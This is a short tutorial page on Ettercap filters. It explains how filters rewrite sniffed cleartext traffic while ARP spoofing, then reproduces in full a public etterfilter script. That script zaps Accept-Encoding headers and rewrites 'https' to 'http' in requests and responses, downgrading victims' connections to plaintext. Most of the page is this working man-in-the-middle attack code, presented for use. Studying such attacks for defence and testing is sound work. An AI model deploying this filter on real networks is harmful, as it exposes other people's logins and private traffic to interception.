My-Tiny.Net :: Breaking Bad
Ettercap Filters
Filters in Ettercap are programs compiled by etterfilter, which are then interpreted by the Ettercap filter interpreter when loaded. The syntax is vaguely PHP-like, but the debugging messages from etterfilter can be cryptic. For instructions, see man etterfilter
Ettercap has the ability to execute regular expression-like filters on cleartext traffic. This allows you to change the contents of packets as you sniff them. To do this, you need to create ettercap filter modules and load them into a running ettercap that is performing ARP spoofing.
etterfilter tutorial
http://www.irongeek.com/i.php?page=security/ettercapfilter
Note: the etterfilter scripting language can be difficult to work with. Avoid using the more complete regex filter functions at this point, because their behavior can be somewhat unpredicatble. Instead, use replace() and other simpler functions.
A nice example is the HTTP Request/Response (Ettercap) Filter by Jan Seidl, which rewrites 'https' strings from requests/responses to 'http', forcing data to be sent over the wire in plaintext. The v1.0 code from his GitHub link is below, and there is a full explanation at https://wroot.org/posts/downgrade-https-connections-to-http-using-ettercap-filters/
#######################################################################
# #
# HTTP Request/Response Filter -- hrf.ef -- filter source file
# #
# by Jan Seidl (based on code from ALoR & NaGA)
# #
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# #
# https://github.com/jseidl/etter.filter.hrf/blob/master/hrf.ef
#######################################################################
##
#
# This filter will substitute the word 'https' with 'http' on
# both HTTP requests and responses.
#
# based on the discussion (and contained code) on forum thread
# http://forums.remote-exploit.org/backtrack-v2-0-final/8126-ettercap-filter-3.html
#
##
##########################
## Zap Content Encoding ##
##########################
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("[HTTP Response Filter] Encoding zapped.\n");
}
}
#####################
## Replace Content ##
#####################
##
# Requests
if (ip.proto == TCP && tcp.dst == 80) {
# msg("[HTTP Response Filter] HTTP request seen.\n");
if (search(DECODED.data, "https")){
replace("https", "http");
msg("[HTTP Response Filter] *** HTTPS ZAPPED from request\n");
}
if (search(DATA.data, "https")){
replace("https", "http");
msg("[HTTP Response Filter] *** HTTPS ZAPPED from request\n");
}
}
##
# Response
if (ip.proto == TCP && tcp.src == 80) {
# msg("[HTTP Response Filter] HTTP response seen.\n");
if (search(DECODED.data, "https")){
replace("https", "http");
msg("[HTTP Response Filter] *** HTTPS ZAPPED from response\n");
}
if (search(DATA.data, "https")){
replace("https", "http");
msg("[HTTP Response Filter] *** HTTPS ZAPPED from response\n");
}
}